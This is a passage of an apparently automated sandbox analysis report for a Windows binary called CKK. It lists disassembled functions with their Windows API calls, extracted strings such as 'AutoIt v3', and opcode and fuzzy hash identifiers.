                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: BlockInput
                                          • String ID:
                                          • API String ID: 3456056419-0
                                          • Opcode ID: 1294b131ae9ee6417c5b89271af1979ba5c180dd9bc59e376be93220a9a760cd
                                          • Instruction ID: eabadcdb31dab44adf2383981fd2a70825f3b97093efa623a671b3c8c92d5891
                                          • Opcode Fuzzy Hash: 1294b131ae9ee6417c5b89271af1979ba5c180dd9bc59e376be93220a9a760cd
                                          • Instruction Fuzzy Hash: 61E01A312002049FC710EF6AE804EDAF7EDAF987A0F109416FC49E7391DA74E8448B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E6781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0
                                          • API String ID: 0-4108050209
                                          • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                          • Instruction ID: e28de22f18323e8738e4032b13a837609c76468a38f2786d242f951a0b6e3ed0
                                          • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                          • Instruction Fuzzy Hash: 815175616CC7155ADB3C8578B95A7FE67D59B823CCF183A09D8C2F7282C611EE41C352
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E76DD9 Relevance: .6, Instructions: 637COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c4c0a90d39b8f0880a393ad7422cafc973ccc430c49948ee9628ca16e5862d6e
                                          • Instruction ID: d3b2989061178b3841704a7c655c19f9a09ee567bd8e524cc4acd4cc21fbcdd1
                                          • Opcode Fuzzy Hash: c4c0a90d39b8f0880a393ad7422cafc973ccc430c49948ee9628ca16e5862d6e
                                          • Instruction Fuzzy Hash: 61327722D28F454DD7239A35CC62335664DAFB33C9F15E33BF86AB99A5EB28C4834100
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E5CC39 Relevance: .6, Instructions: 635COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 23015ca265ea2371c5dc6969254b61d8b32be6b128f0564d495978259327052d
                                          • Instruction ID: 3b41a8e60b8ed503fe562693d5582591b50509ffd18e6437e78d4309345cc5ab
                                          • Opcode Fuzzy Hash: 23015ca265ea2371c5dc6969254b61d8b32be6b128f0564d495978259327052d
                                          • Instruction Fuzzy Hash: E3324D31A002458FDF24EF28C4A46BDBBA1EF45309F38A966D95AF7292D330DD85DB41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E47920 Relevance: .6, Instructions: 563COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 95fa782a57474dea93b69ebf631edcefa9158df357bd645ea35319b7ad3f1ea7
                                          • Instruction ID: 9418db575c0d50f9fca21dbfc9c19f26433baccc40a183e888a55ba99e9508dd
                                          • Opcode Fuzzy Hash: 95fa782a57474dea93b69ebf631edcefa9158df357bd645ea35319b7ad3f1ea7
                                          • Instruction Fuzzy Hash: BA22AFB1A006099FDF14DF64D881AEEB3F6FF48304F146529E85AB7291EB359D14CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E491C0 Relevance: .5, Instructions: 475COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e2cbbebca2ca320f877656f5d902c01828a9f6d4b244584ba32e13d9820bd38a
                                          • Instruction ID: 892e1c86a3e8f8972cbee48e23541117006a2f91213e732a5c85686458c9c86b
                                          • Opcode Fuzzy Hash: e2cbbebca2ca320f877656f5d902c01828a9f6d4b244584ba32e13d9820bd38a
                                          • Instruction Fuzzy Hash: DD02A6B1E00119EBDB04EF64D881AAEB7F5FF44304F109565E81ABB391EB31AE14CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E619B0 Relevance: .2, Instructions: 240COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                          • Instruction ID: 7320e47ab629cd8acb4662a514797d1a60cd5577a2dca0ae13fc3e28191ed449
                                          • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                          • Instruction Fuzzy Hash: 9E91A3322490E34ADB2F427AA57407DFFE15A923E631E27DDD4F2EA1C1FD148554E620
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E61706 Relevance: .2, Instructions: 232COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                          • Instruction ID: 5859ae1b45b1b9b2fc35fea00232732fc3132899b43aa822de467bfdc7a691be
                                          • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                          • Instruction Fuzzy Hash: 3D8161726480E30ADB6F823A953407EFFE15A923E531E27DED4F2DB1C1EE249554E620
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB2046 Relevance: .1, Instructions: 72COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f2b2d792071d3d466ff05be23aaf14e1eefe31ddf6e4b421f8706f09f2ad14eb
                                          • Instruction ID: 75457d5ac0c09eb27e5ff6bf8dd96618d0c348003039c38630c43e025da7ed2e
                                          • Opcode Fuzzy Hash: f2b2d792071d3d466ff05be23aaf14e1eefe31ddf6e4b421f8706f09f2ad14eb
                                          • Instruction Fuzzy Hash: C721E7323206158BDB28CF79C8236BE73E5AB54310F158A2EE4A7D33D0DE35A904DB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E5D071 Relevance: .0, Instructions: 30COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5eccedda4d59d461ace39051ca89190d02fb05e6e9ef7f3bff90add423f835b6
                                          • Instruction ID: d93f52d3f7135b4b8f3aa4e95b6eea1228a09e60594e80fd9dd8b36be13ecfd8
                                          • Opcode Fuzzy Hash: 5eccedda4d59d461ace39051ca89190d02fb05e6e9ef7f3bff90add423f835b6
                                          • Instruction Fuzzy Hash: B9F0DE0204DEDABBCB5B0622987F1A66FB0C84702422807CF849B06BD79BCC109DC352
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 00EC2B30
                                          • DeleteObject.GDI32(00000000), ref: 00EC2B43
                                          • DestroyWindow.USER32 ref: 00EC2B52
                                          • GetDesktopWindow.USER32 ref: 00EC2B6D
                                          • GetWindowRect.USER32(00000000), ref: 00EC2B74
                                          • SetRect.USER32 ref: 00EC2CA3
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00EC2CB1
                                          • CreateWindowExW.USER32 ref: 00EC2CF8
                                          • GetClientRect.USER32 ref: 00EC2D04
                                          • CreateWindowExW.USER32 ref: 00EC2D40
                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00EC2D62
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00EC2D75
                                          • GlobalAlloc.KERNEL32 ref: 00EC2D80
                                          • GlobalLock.KERNEL32 ref: 00EC2D89
                                          • ReadFile.KERNEL32 ref: 00EC2D98
                                          • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EC2DA1
                                          • CloseHandle.KERNEL32(00000000), ref: 00EC2DA8
                                          • GlobalFree.KERNEL32 ref: 00EC2DB3
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00EC2DC5
                                          • OleLoadPicture.OLEAUT32 ref: 00EC2DDB
                                          • GlobalFree.KERNEL32 ref: 00EC2DEB
                                          • CopyImage.USER32 ref: 00EC2E11
                                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00EC2E30
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00EC2E52
                                          • ShowWindow.USER32(00000004), ref: 00EC303F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                          • String ID: $AutoIt v3$DISPLAY$static
                                          • API String ID: 2211948467-2373415609
                                          • Opcode ID: 30f87ed827aeecfe911223f58ce8a4b71d1e09d8ef01470de223ace09725f984
                                          • Instruction ID: 827ee94c17b2a395d80f7bb784f8655bdf822858598a4407694c863e6c25240c
                                          • Opcode Fuzzy Hash: 30f87ed827aeecfe911223f58ce8a4b71d1e09d8ef01470de223ace09725f984
                                          • Instruction Fuzzy Hash: 1F028871A00219AFDB14CF65DD89EAEBBB9EB48750F10811DF915BB2A0CB35ED05CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetTextColor.GDI32(?,00000000), ref: 00ED712F
                                          • GetSysColorBrush.USER32 ref: 00ED7160
                                          • GetSysColor.USER32 ref: 00ED716C
                                          • SetBkColor.GDI32(?,000000FF), ref: 00ED7186
                                          • SelectObject.GDI32 ref: 00ED7195
                                          • InflateRect.USER32 ref: 00ED71C0
                                          • GetSysColor.USER32 ref: 00ED71C8
                                          • CreateSolidBrush.GDI32 ref: 00ED71CF
                                          • FrameRect.USER32 ref: 00ED71DE
                                          • DeleteObject.GDI32(00000000), ref: 00ED71E5
                                          • InflateRect.USER32 ref: 00ED7230
                                          • FillRect.USER32 ref: 00ED7262
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00ED7284
                                            • Part of subcall function 00ED73E8: GetSysColor.USER32 ref: 00ED7421
                                            • Part of subcall function 00ED73E8: SetTextColor.GDI32(?,?), ref: 00ED7425
                                            • Part of subcall function 00ED73E8: GetSysColorBrush.USER32 ref: 00ED743B
                                            • Part of subcall function 00ED73E8: GetSysColor.USER32 ref: 00ED7446
                                            • Part of subcall function 00ED73E8: GetSysColor.USER32 ref: 00ED7463
                                            • Part of subcall function 00ED73E8: CreatePen.GDI32 ref: 00ED7471
                                            • Part of subcall function 00ED73E8: SelectObject.GDI32 ref: 00ED7482
                                            • Part of subcall function 00ED73E8: SetBkColor.GDI32(?,00000000), ref: 00ED748B
                                            • Part of subcall function 00ED73E8: SelectObject.GDI32 ref: 00ED7498
                                            • Part of subcall function 00ED73E8: InflateRect.USER32 ref: 00ED74B7
                                            • Part of subcall function 00ED73E8: RoundRect.GDI32 ref: 00ED74CE
                                            • Part of subcall function 00ED73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00ED74DB
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                          • String ID:
                                          • API String ID: 4124339563-0
                                          • Opcode ID: 7420cef9bceaed94e70f5bd4586fa358069e5126eac33589b3bfafde1bf2284a
                                          • Instruction ID: c9843158cc381d81fb8e6334725b3db8d135ca083aede7d5ba52e481a272b33c
                                          • Opcode Fuzzy Hash: 7420cef9bceaed94e70f5bd4586fa358069e5126eac33589b3bfafde1bf2284a
                                          • Instruction Fuzzy Hash: 4BA1B67100A312AFDB009F61EC48E5BB7A9FF49364F201B1AF9A2B61E1D731D949CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E58D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32 ref: 00E58E14
                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E96AC5
                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E96AFE
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E96F43
                                            • Part of subcall function 00E58F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00E58FC5
                                          • SendMessageW.USER32(?,00001053), ref: 00E96F7F
                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E96F96
                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00E96FAC
                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00E96FB7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                          • String ID: 0
                                          • API String ID: 2760611726-4108050209
                                          • Opcode ID: 6c8cb1f6cb4c5175acbf6c2fe1a67ffe81d6365db8f0ab4d8ce9395852b4b5d8
                                          • Instruction ID: c343cd5c512723a429fc8696b2de08031cfb253d03dade884c5bf1002dad8b69
                                          • Opcode Fuzzy Hash: 6c8cb1f6cb4c5175acbf6c2fe1a67ffe81d6365db8f0ab4d8ce9395852b4b5d8
                                          • Instruction Fuzzy Hash: 2B12EC30201201EFDB25CF24D985BAAB7F1FB44305F64A42AF995BB261CB31EC56DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32 ref: 00EC273E
                                          • SystemParametersInfoW.USER32 ref: 00EC286A
                                          • SetRect.USER32 ref: 00EC28A9
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00EC28B9
                                          • CreateWindowExW.USER32 ref: 00EC2900
                                          • GetClientRect.USER32 ref: 00EC290C
                                          • CreateWindowExW.USER32 ref: 00EC2955
                                          • CreateDCW.GDI32 ref: 00EC2964
                                          • GetStockObject.GDI32 ref: 00EC2974
                                          • SelectObject.GDI32 ref: 00EC2978
                                          • GetTextFaceW.GDI32 ref: 00EC2988
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EC2991
                                          • DeleteDC.GDI32 ref: 00EC299A
                                          • CreateFontW.GDI32 ref: 00EC29C6
                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EC29DD
                                          • CreateWindowExW.USER32 ref: 00EC2A1D
                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EC2A31
                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EC2A42
                                          • CreateWindowExW.USER32 ref: 00EC2A77
                                          • GetStockObject.GDI32 ref: 00EC2A82
                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EC2A8D
                                          • ShowWindow.USER32(00000004), ref: 00EC2A97
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                          • API String ID: 2910397461-517079104
                                          • Opcode ID: 622af39e8d8297870e511d33b3c4cca8ccd49367dd94bed867a907842baaa71f
                                          • Instruction ID: 4a030619d16aba4dbd159d14c1a026e0f3e2e57f5f9ca204d2b43cbb28306a59
                                          • Opcode Fuzzy Hash: 622af39e8d8297870e511d33b3c4cca8ccd49367dd94bed867a907842baaa71f
                                          • Instruction Fuzzy Hash: DAB15D71A00219AFEB14DF69DD85FAEBBA9FB48710F108519FA14EB290D774ED01CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00EB4AED
                                          • GetDriveTypeW.KERNEL32 ref: 00EB4BCA
                                          • SetErrorMode.KERNEL32(00000000), ref: 00EB4D36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DriveType
                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                          • API String ID: 2907320926-4222207086
                                          • Opcode ID: fac8c8204e0fe19e7a885f1839b95069b2ffad6c234be0cc1afa3d67f160cc3b
                                          • Instruction ID: 697f2f391c1b6108d36f96d29e07087026614b21abfa2262b266196be4a2461e
                                          • Opcode Fuzzy Hash: fac8c8204e0fe19e7a885f1839b95069b2ffad6c234be0cc1afa3d67f160cc3b
                                          • Instruction Fuzzy Hash: 5961C4B16061069BDB04DF14CA81AFABBA0AB44B44B20A415F846FB6D3DB35ED45FF42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 1996641542-0
